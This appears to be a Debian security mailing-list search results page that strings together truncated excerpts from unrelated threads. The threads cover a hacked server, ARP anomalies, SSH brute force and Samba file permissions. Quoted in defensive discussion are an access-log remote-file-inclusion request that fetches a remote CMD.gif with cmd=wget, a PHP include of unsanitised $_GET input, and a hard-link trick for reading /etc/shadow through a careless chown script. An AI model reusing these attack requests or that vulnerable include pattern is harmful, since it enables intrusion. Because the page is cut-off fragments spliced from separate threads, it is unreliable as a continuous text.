Probably to borrow some money ?:)
On Mon, Mar 7, 2016 at 3:28 PM, Ruben Zaqaryan wrote:
> borrow some money ?:)
>
> On Mon, Mar 7, 2016 at 3:20 PM, VieuxGeek DuSystem
> wrote:
>
>> For urgency you should call the 911
>>
>>
>>
>> 2016-03-07 11:52 GMT+01:00 Peter Szabo :
>> > Probably with your m
For urgency you should call the 911
2016-03-07 11:52 GMT+01:00 Peter Szabo :
> Probably with your mail client? :)
>
>
> On 2016-03-07 11:51, Zack Piper wrote:
>>
>> This is the third messgae you've sent of this kind, is there actually
>> anything you need help with?
>>
>>
>
Probably with your mail client? :)
On 2016-03-07 11:51, Zack Piper wrote:
This is the third messgae you've sent of this kind, is there actually
anything you need help with?
This is the third messgae you've sent of this kind, is there actually
anything you need help with?
--
Zack Piper http://apertron.net
On Thu, Mar 3, 2016 at 7:17 PM, ldak mail wrote:
> help
What are you looking for help with?
--
bye,
pabs
https://wiki.debian.org/PaulWise
Once you've got it fixed make your nsswitch.conf uses "compat" for
passwd, group and shadow and root has a local password. I normally
have a local non-root login to each machine as well. You can either
configure that to have a password or use ssh keys to control access
(or both). That'll save you t
hi !
you should have a root account in /etc/passwd ?
try to boot with a live CD, backup your /etc/nsswitch.conf, remove all
ldap entry in this file. You should just have :
passwd: compat
group: compat
shadow: compat
hosts: files mdns4_minimal [NOTFOUND=return
On Tue, Feb 12, 2008 at 6:10 PM, Robert Shadowen
<[EMAIL PROTECTED]> wrote:
> help
>
> ==
> Robert Shadowen
> Simulation/Verification Tools [EMAIL PROTECTED]
> IBM Austin
Hi,
Manon Metten wrote:
> For the testing distribution (etch) these problems have been fixed in
> >version 2.0.4.dfsg.2-6.
[...]
> I checked with 'apt-cache show openoffice.org' and somewhere I found
> 'Version: 2.0.4.dfsg.2-5'.
[...]>
> Is there anything wrong or missing in this sources.list?
W
On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote:
> Hello!
>
> >http://jesusch.de/~jesusch/tmp/access.log
>
> There are many log entries with "something=http://"; style
> pattern. These are common attack methods against default configured
> servers with poorly written applications.
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 495
> "http://85.214.18.193
Hi Fuzzums,
Fuzzums schrieb:
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/conne
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.p
Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessable (index.php?img=1 e.g.)
>
> ther definately might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?
Hello!
http://jesusch.de/~jesusch/tmp/access.log
There are many log entries with "something=http://"; style
pattern. These are common attack methods against default configured
servers with poorly written applications. Many of these rely on
register_globals=on php.ini setting. Turn it off first
I've putted access.log online with the following cutted off:
grep -v "Googlebot/2.1" access.log.1| grep -v ^87.106.31.224|grep -v
gallery|grep -v "Yahoo! Slurp"|grep -vi svn |grep -v mediawiki |grep -v
"favicon.ico"
http://jesusch.de/~jesusch/tmp/access.log
at that mentioned time someone at l
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (propably any php-stuff)
was/is vulnerable.
All I've found so far where these entries in my apache2 error-log.
http://jesusch
Hello,
On Thu, Oct 19, 2006 at 01:00:27AM +0200, Javier Fern?ndez-Sanguino Pe?a wrote:
> ... a Rogue user is sending you gratuitous ARP packets to poison your cache
> for all IPs in the network ...
Please excuse me for going out of the original topic, but there is
one thing I would like to clarif
On 10/20/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote:
On Thu, Oct 19, 2006 at 11:01:39AM +0800, Lestat V wrote:
> On 10/19/06, Lestat V <[EMAIL PROTECTED]> wrote:
> >On 10/19/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote:
> >> On Wed, Oct 18, 2006 at 11:09:35AM +08
On 10/20/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote:
On Thu, Oct 19, 2006 at 07:53:29AM +0800, Lestat V wrote:
No, you arp requests are the "arp who-has YYY tell XXX" where XXX is the one
[...]
Sorry for the misunderstanding.
Yes, but do you *see* ARP replies incoming to you
On Thu, Oct 19, 2006 at 11:01:39AM +0800, Lestat V wrote:
> On 10/19/06, Lestat V <[EMAIL PROTECTED]> wrote:
> >On 10/19/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote:
> >> On Wed, Oct 18, 2006 at 11:09:35AM +0800, Lestat V wrote:
>
> I tried "/usr/sbin/tcpdump -ei eth0 arp" for a w
On Thu, Oct 19, 2006 at 07:53:29AM +0800, Lestat V wrote:
> I tried using "arp -an -i eth0" plus "arping [MAC]", and results:
> dance:/home/lestat# arp -an -i eth0
> ? (10.100.105.251) at 00:07:84:52:55:3C [ether] on eth0
> ? (10.100.105.252) at 00:07:84:52:55:3D [ether] on eth0
> ? (10.100.105.250
On 10/19/06, Lestat V <[EMAIL PROTECTED]> wrote:
On 10/19/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote:
> On Wed, Oct 18, 2006 at 11:09:35AM +0800, Lestat V wrote:
I tried "/usr/sbin/tcpdump -ei eth0 arp" for a while and got results
as excerpted as follows: (10.100.105.105 is me
Thanx.
On 10/19/06, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]> wrote:
On Wed, Oct 18, 2006 at 11:09:35AM +0800, Lestat V wrote:
So, I guess you are saying that if you run 'arp -n' in 'You' and 'Other'
systems in the same VLAN you see this:
Right? How 'peculiar' is that MAC address you a
On Wed, Oct 18, 2006 at 11:09:35AM +0800, Lestat V wrote:
> I encouter an fake MAC address problem:
>
> I found that on ARP table of my computer, all IP addresses in my LAN
> have a same and pecular MAC address. On ARP table of two other
> computers in the same LAN as mine, different IP addresses
Yes this could be perfectly normal.
Are you behind a bridge ?
> -Original Message-
> From: Lestat V [mailto:[EMAIL PROTECTED]
> Sent: 18 October 2006 04:10
> To: debian-security@lists.debian.org
> Subject: help: duplicate MAC address
>
> I encouter an fake MAC address problem:
>
> I fou
martin f krafft <[EMAIL PROTECTED]> writes:
> also sprach Lestat V <[EMAIL PROTECTED]> [2006.10.18.0509 +0200]:
>> Can it be normal? Or what may be going on my computer and the LAN?
>
> Yes, this can happen. I suggest you use the ifupdown pre-up hook to
> change them on each machine.
>
> iface eth
also sprach Lestat V <[EMAIL PROTECTED]> [2006.10.18.1115 +0200]:
> Thanx. I am not quite sure about what you mean. However, the HAddress
> as indicated by the "ifconfig -a" is "00:11:2F:57:9B:6F", which is not
> the one as indicated in the ARP cache in other machine.
in that case you may just hav
Thanx. I am not quite sure about what you mean. However, the HAddress
as indicated by the "ifconfig -a" is "00:11:2F:57:9B:6F", which is not
the one as indicated in the ARP cache in other machine.
On 10/18/06, martin f krafft <[EMAIL PROTECTED]> wrote:
also sprach Lestat V <[EMAIL PROTECTED]> [2
also sprach Lestat V <[EMAIL PROTECTED]> [2006.10.18.0509 +0200]:
> Can it be normal? Or what may be going on my computer and the LAN?
Yes, this can happen. I suggest you use the ifupdown pre-up hook to
change them on each machine.
iface eth0 inet dhcp
pre-up ip link set $IFACE address de:ad:be
On Sat, 2005-12-10 at 23:43 -0500, Luis A. Rondon Paz wrote:
>
>
>
>
This email contains the help you requested.
-davidc
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
---Message d'origine-
De : Paolo Pedaletti [mailto:[EMAIL PROTECTED]
Envoyé : vendredi 22 juillet 2005 11:32
À : debian-security@lists.debian.org
Objet : Re: Help needed - server hacked twice in three days (and I don't
think I'm a newbie)
ciao Thomas Sjögren,
> . Better pas
Karsten Dambekalns wrote:
Jul 19 03:07:30 ds217-115-141-24 sshd[27011]: Illegal user anton from
217.115.205.101
# whois 217.115.205.101
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools
ciao Thomas Sjögren,
> . Better passwords
like using libpam-cracklib and dcredit,ucredit,lcredit,ocredit options
and...
- send syslog (better syslog-ng) entries to a log-server
- chroot LAMP
- run nessus against the server
- run snort on server
- ... (what else?)
If he had enough time, he
I don't know what type of php applications you are using with apache, but
with php I would recommend to use something like 'modsecurity' for apache,
configuring modsecurity to your needs and have apache chrooted. For
iptables, something like firehol can help you to setup iptables quickly.
--
-J
In gmane.linux.debian.devel.security, you wrote:
> Now, I find it unlikely to see the same local root exploit in 2.4.18 and
> 2.6.7. How did he gain root access?
Are you sure it's 2.6.7 and not 2.6.8, the Sarge kernel?
Anyway, there are several unfixed local privilege escalation security
issues i
Hi.
On Friday 22 July 2005 00:00, Rob Sims wrote:
> On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> > way? What is currently possible in that respect on a machien that runs
> > ssh, apache, php, exim and nothing else (all as of Debian 3.1)?
>
> Didn't one of your logs show ov
Hi.
On Friday 22 July 2005 00:14, Ulf Harnhammar wrote:
> On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> > way? What is currently possible in that respect on a machien that runs
> > ssh, apache,
> ^^
> >
Goswin von Brederlow <[EMAIL PROTECTED]> writes:
> Karsten Dambekalns <[EMAIL PROTECTED]> writes:
>
>> Hi.
>>
>> On Thursday 21 July 2005 20:31, Andras Got wrote:
>>> The users, the ones the machines was hacked, were they existing users on
>>> the machine?
>>
>> I don't know which user account got
Hi.
On Thursday 21 July 2005 22:52, Goswin von Brederlow wrote:
> > I don't know which user account got hacked, if this was what has
> > happened.
>
> Did you check the last lock? Maybe the attacker didn't remove the
> traces there.
He ran the mentioned logclean binary, the content of wtmp is not
On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> Another question came up here. Is it really likely to be a SSH brute force
> break in, or could the attacker have been able to log in some other way? What
> is currently possible in that respect on a machien that runs ssh, apac
Hi.
On Thursday 21 July 2005 22:39, Andras Got wrote:
> It's important to know whether it's an existing account, imho.
Yes. It is, because if it's not, it's not about cracking passwords, but
something else. Ugh.
> >>Do you use AllowUsers or AllowGroup?
> >
> > No. I hate to admit I didn't know
On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> Another question came up here. Is it really likely to be a SSH brute force
> break in, or could the attacker have been able to log in some other way? What
> is currently possible in that respect on a machien that runs ssh, apac
Hi.
Thanks for your reply!
Another question came up here. Is it really likely to be a SSH brute force
break in, or could the attacker have been able to log in some other way? What
is currently possible in that respect on a machien that runs ssh, apache,
php, exim and nothing else (all as of De
Karsten Dambekalns <[EMAIL PROTECTED]> writes:
> Hi.
>
> On Thursday 21 July 2005 20:31, Andras Got wrote:
>> The users, the ones the machines was hacked, were they existing users on
>> the machine?
>
> I don't know which user account got hacked, if this was what has happened.
Did you check the l
On Thu, Jul 21, 2005 at 08:17:38PM +0200, Karsten Dambekalns wrote:
> Now, I find it unlikely to see the same local root exploit in 2.4.18 and
> 2.6.7.
They are both old kernels, compile your own and apply suitable patches.
Grsecurity is one, and it doesn't need any particular configuration.
>
Hi,
Karsten Dambekalns írta:
Hi.
On Thursday 21 July 2005 20:31, Andras Got wrote:
The users, the ones the machines was hacked, were they existing users on
the machine?
I don't know which user account got hacked, if this was what has happened.
It's important to know whether it's an exis
Hi.
On Thursday 21 July 2005 20:31, Andras Got wrote:
> The users, the ones the machines was hacked, were they existing users on
> the machine?
I don't know which user account got hacked, if this was what has happened.
> Do you use AllowUsers or AllowGroup?
No. I hate to admit I didn't know tha
> hi, im trying make a test lan with vpn gatway running
> openswan 2.3 with debian woody.
>
> this is my sample lan:
>
>...
>
>
> Can anybody help me with this connection setup?
>
> greets
>
> Rodrigo
>
Dear Rodrigo,
I think your question is out of scope for this mailing list.
Please check the d
Did you trie to use the share parameters
force group = ...
create mask = ...
directory mask = ...
In our installation they work pretty well.
Jann
---
Jann Wegner
Institut fuer Demoskopie Allensbach, EDV
fon +49 7533 805148
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fern?ndez-Sanguino Pe?a wrote:
> On Tue, Feb 17, 2004 at 03:12:44PM -0600, Hhayes wrote:
> > I have a Debian box running as a file server on a network with 50 users. So
> (...)
> > saved the file, resulting in a file that no other users can write to.
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fern?ndez-Sanguino Pe?a wrote:
> On Tue, Feb 17, 2004 at 03:12:44PM -0600, Hhayes wrote:
> > I have a Debian box running as a file server on a network with 50 users. So
> (...)
> > saved the file, resulting in a file that no other users can write to.
On Thu, 19 Feb 2004 09:12, Michael Stone <[EMAIL PROTECTED]> wrote:
> On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
> >The other way of doing it properly is to write a program that open's each
> >file, calls fstat() to check the UID/GID, then uses fchown() or fchmod().
> >
> >It wo
On Thu, 19 Feb 2004 09:12, Michael Stone <[EMAIL PROTECTED]> wrote:
> On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
> >The other way of doing it properly is to write a program that open's each
> >file, calls fstat() to check the UID/GID, then uses fchown() or fchmod().
> >
> >It wo
Le 12466ième jour après Epoch,
Michael Stone écrivait:
> On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
>> The other way of doing it properly is to write a program that open's
>> each file, calls fstat() to check the UID/GID, then uses fchown() or
>> fchmod().
>>
>> It would be nic
Le 12466ième jour après Epoch,
Michael Stone écrivait:
> On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
>> The other way of doing it properly is to write a program that open's
>> each file, calls fstat() to check the UID/GID, then uses fchown() or
>> fchmod().
>>
>> It would be nic
Well done Stefano!
Hhayes, have a look at your mask setting near the top of
/etc/samba/samba.conf. You should be able to make samba behave the way
you want, even with Excel files, now you know that Excel is deleting
then rewriting the files.
Another way to prove files were being deleted and
A user can override the system default by putting their own umask
command in $HOME/.bashrc after the line that reads the system default.
On 02/19/04 04:11, Hhayes wrote:
Changing the umask to 007 didn't have any effect on the problem. So far
I've tried 000 and 007.
Well done Stefano!
Hhayes, have a look at your mask setting near the top of
/etc/samba/samba.conf. You should be able to make samba behave the way
you want, even with Excel files, now you know that Excel is deleting
then rewriting the files.
Another way to prove files were being deleted and
A user can override the system default by putting their own umask
command in $HOME/.bashrc after the line that reads the system default.
On 02/19/04 04:11, Hhayes wrote:
Changing the umask to 007 didn't have any effect on the problem. So far
I've tried 000 and 007.
--
To UNSUBSCRIBE, email
On 02/18/04 17:24, David Ehle wrote:
2) Referring back to your original post, the only user who can change
the owner of a file is the owner of that file, with the chown command.
Even this is a little complex as a normal user can NOT give away ownership
of their files. I guess people we
On Wed, Feb 18, 2004 at 01:59:37PM +0100, Javier Fernández-Sanguino Peña wrote:
That is, of course, if the partitions in the system have not been setup
properly.
What "properly"? Use a symlink instead of a hard link, you get the same
result but with a different race. Or use the old "make a dee
On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
The other way of doing it properly is to write a program that open's each
file, calls fstat() to check the UID/GID, then uses fchown() or fchmod().
It would be nice if someone was to patch the -R option of chown/chgrp/chmod in
core
On 02/18/04 17:24, David Ehle wrote:
2) Referring back to your original post, the only user who can change
the owner of a file is the owner of that file, with the chown command.
Even this is a little complex as a normal user can NOT give away ownership
of their files. I guess people were u
On Wed, Feb 18, 2004 at 02:23:30PM +0100, Javier Fernández-Sanguino Peña wrote:
Hmmm.. I did say there was plenty of room for improvement, after all,
obviously shell scripting is more prone to failure than a proper program
in C but let's give it a shot:
You're barking up the wrong tree. You ca
On Wed, Feb 18, 2004 at 01:59:37PM +0100, Javier Fernández-Sanguino Peña wrote:
That is, of course, if the partitions in the system have not been setup
properly.
What "properly"? Use a symlink instead of a hard link, you get the same
result but with a different race. Or use the old "make a deep d
On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
The other way of doing it properly is to write a program that open's each
file, calls fstat() to check the UID/GID, then uses fchown() or fchmod().
It would be nice if someone was to patch the -R option of chown/chgrp/chmod in
coreut
On Wed, Feb 18, 2004 at 02:23:30PM +0100, Javier Fernández-Sanguino Peña wrote:
Hmmm.. I did say there was plenty of room for improvement, after all,
obviously shell scripting is more prone to failure than a proper program
in C but let's give it a shot:
You're barking up the wrong tree. You can't
I didn't realize that Excel did that, but you are right. I just noticed
that it is only effecting Excel files. It just so happend that the
directories that I was looking at contained only Excel files, but after
checking, all other file types seem to be working fine.
Thanks.
"Stefano Salvi" <[EM
I didn't realize that Excel did that, but you are right. I just noticed
that it is only effecting Excel files. It just so happend that the
directories that I was looking at contained only Excel files, but after
checking, all other file types seem to be working fine.
Thanks.
"Stefano Salvi" <[EM
At 09.11 18/02/2004 -0600, Hhayes wrote:
After saving the file, if I run a ls -l on
the directory the file permissions on the file I opened are set to "hhayes"
as the owner with rw permission, and the group is set to "users" with only r
permission. I am not deleting the file and recreating it, o
Wow, this is so completely OT I like it...
On Wednesday, 2004-02-18 at 13:58:59 +0100, Ivan Brezina wrote:
> hmm, xargs does not use quotes when executing commands. This causes
> problems with dirs with spaces in name.
> If user has directory named "dummy root", he can easily get accsess to
> /
On Wed, Feb 18, 2004 at 01:58:59PM +0100, Ivan Brezina wrote:
> [...]
>
> hmm, xargs does not use quotes when executing commands. This causes
> problems with dirs with spaces in name.
> If user has directory named "dummy root", he can easily get accsess to
> /root directory.
Use "find -print0" a
Changing the umask to 007 didn't have any effect on the problem. So far
I've tried 000 and 007.
You said:
> 2) Referring back to your original post, the only user who can change
> the owner of a file is the owner of that file, with the chown command.
> For someone else to apparently change the ow
At 09.11 18/02/2004 -0600, Hhayes wrote:
After saving the file, if I run a ls -l on
the directory the file permissions on the file I opened are set to "hhayes"
as the owner with rw permission, and the group is set to "users" with only r
permission. I am not deleting the file and recreating it, onl
Wow, this is so completely OT I like it...
On Wednesday, 2004-02-18 at 13:58:59 +0100, Ivan Brezina wrote:
> hmm, xargs does not use quotes when executing commands. This causes
> problems with dirs with spaces in name.
> If user has directory named "dummy root", he can easily get accsess to
> /
On Wed, Feb 18, 2004 at 01:58:59PM +0100, Ivan Brezina wrote:
> [...]
>
> hmm, xargs does not use quotes when executing commands. This causes
> problems with dirs with spaces in name.
> If user has directory named "dummy root", he can easily get accsess to
> /root directory.
Use "find -print0" a
Changing the umask to 007 didn't have any effect on the problem. So far
I've tried 000 and 007.
You said:
> 2) Referring back to your original post, the only user who can change
> the owner of a file is the owner of that file, with the chown command.
> For someone else to apparently change the ow
On Thu, Feb 19, 2004 at 12:19:31AM +1100, Russell Coker wrote:
> Regardless, you will still have the same problem if a user creates hard links
> to files owned by another user (presuming that you don't have a mount point
> per user or a file system such as NFS that doesn't support hard-links).
N
On Thu, 19 Feb 2004 00:23, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]>
wrote:
> On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
> > If you are going to change such things then you need to use the -uid or
> > -gid options to find (depending on whether you are changing the UID
On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
> If you are going to change such things then you need to use the -uid or -gid
> options to find (depending on whether you are changing the UID or GID), and
> you need to do it when the machine is in single-user mode (IE no-one can
>
On Wed, 18 Feb 2004 23:59, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]>
wrote:
> On Wed, Feb 18, 2004 at 11:05:30AM +0100, Richard Atterer wrote:
> > Waah, SCARY!
> >
> > Users can create hard links to arbitrary files in that directory, e.g.
> > links to other users' private files or to
Kristopher Matthews wrote:
This is a security nightmare. I would *not* recommend doing any such
thing in a user filesystem.
You're making the assumption that he LIKES his users. :)
On Wed, 18 Feb 2004, Michael Stone wrote:
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino
On Wed, Feb 18, 2004 at 11:05:30AM +0100, Richard Atterer wrote:
> Waah, SCARY!
>
> Users can create hard links to arbitrary files in that directory, e.g.
> links to other users' private files or to /etc/shadow, and automatically
> get read access to those files.
That is, of course, if the
On Wed, 18 Feb 2004 23:30, Kristopher Matthews <[EMAIL PROTECTED]> wrote:
> > This is a security nightmare. I would *not* recommend doing any such
> > thing in a user filesystem.
>
> You're making the assumption that he LIKES his users. :)
It's not a matter of whether the admin likes his users, it
> This is a security nightmare. I would *not* recommend doing any such
> thing in a user filesystem.
You're making the assumption that he LIKES his users. :)
On Wed, 18 Feb 2004, Michael Stone wrote:
> On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peña
> wrote:
> >DIR_TO_F
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peña wrote:
DIR_TO_FIX=/home/groupX
GROUP=mygroup
PERM=g+rwX
find $DIR_TO_FIX -type f -o -type d | xargs chown $GROUP
# or chown -hR $GROUP $DIR_TO_FIX
find $DIR_TO_FIX -type f -o -type d | xargs chmod $PERM
# or chmod -hR $PE
On Thu, Feb 19, 2004 at 12:19:31AM +1100, Russell Coker wrote:
> Regardless, you will still have the same problem if a user creates hard links
> to files owned by another user (presuming that you don't have a mount point
> per user or a file system such as NFS that doesn't support hard-links).
N
On Thu, 19 Feb 2004 00:23, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]>
wrote:
> On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
> > If you are going to change such things then you need to use the -uid or
> > -gid options to find (depending on whether you are changing the UID
On Wed, Feb 18, 2004 at 11:50:27PM +1100, Russell Coker wrote:
> If you are going to change such things then you need to use the -uid or -gid
> options to find (depending on whether you are changing the UID or GID), and
> you need to do it when the machine is in single-user mode (IE no-one can
>
On Wed, 18 Feb 2004 23:59, Javier Fernández-Sanguino Peña <[EMAIL PROTECTED]>
wrote:
> On Wed, Feb 18, 2004 at 11:05:30AM +0100, Richard Atterer wrote:
> > Waah, SCARY!
> >
> > Users can create hard links to arbitrary files in that directory, e.g.
> > links to other users' private files or to
Kristopher Matthews wrote:
This is a security nightmare. I would *not* recommend doing any such
thing in a user filesystem.
You're making the assumption that he LIKES his users. :)
On Wed, 18 Feb 2004, Michael Stone wrote:
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peñ
On Wed, Feb 18, 2004 at 11:05:30AM +0100, Richard Atterer wrote:
> Waah, SCARY!
>
> Users can create hard links to arbitrary files in that directory, e.g.
> links to other users' private files or to /etc/shadow, and automatically
> get read access to those files.
That is, of course, if the
On Wed, 18 Feb 2004 23:30, Kristopher Matthews <[EMAIL PROTECTED]> wrote:
> > This is a security nightmare. I would *not* recommend doing any such
> > thing in a user filesystem.
>
> You're making the assumption that he LIKES his users. :)
It's not a matter of whether the admin likes his users, it
> This is a security nightmare. I would *not* recommend doing any such
> thing in a user filesystem.
You're making the assumption that he LIKES his users. :)
On Wed, 18 Feb 2004, Michael Stone wrote:
> On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peña wrote:
> >DIR_TO_FIX=
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peña wrote:
DIR_TO_FIX=/home/groupX
GROUP=mygroup
PERM=g+rwX
find $DIR_TO_FIX -type f -o -type d | xargs chown $GROUP
# or chown -hR $GROUP $DIR_TO_FIX
find $DIR_TO_FIX -type f -o -type d | xargs chmod $PERM
# or chmod -hR $PERM $
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peña wrote:
> You can try to settle it by using umask (as other's have suggested) but
> users can defeat that. If you _really_ want to fix it, have a cronjob do
> this (quick and dirty, could be _really_ improved)
>
> --
On Wed, Feb 18, 2004 at 02:15:36AM +0100, Javier Fernández-Sanguino Peña wrote:
> You can try to settle it by using umask (as other's have suggested) but
> users can defeat that. If you _really_ want to fix it, have a cronjob do
> this (quick and dirty, could be _really_ improved)
>
> --
> 2) Referring back to your original post, the only user who can change
> the owner of a file is the owner of that file, with the chown command.
Even this is a little complex as a normal user can NOT give away ownership
of their files. I guess people were using the ability to avoid quota
limits
> 2) Referring back to your original post, the only user who can change
> the owner of a file is the owner of that file, with the chown command.
Even this is a little complex as a normal user can NOT give away ownership
of their files. I guess people were using the ability to avoid quota
limits
1 - 100 of 213 matches
Mail list logo
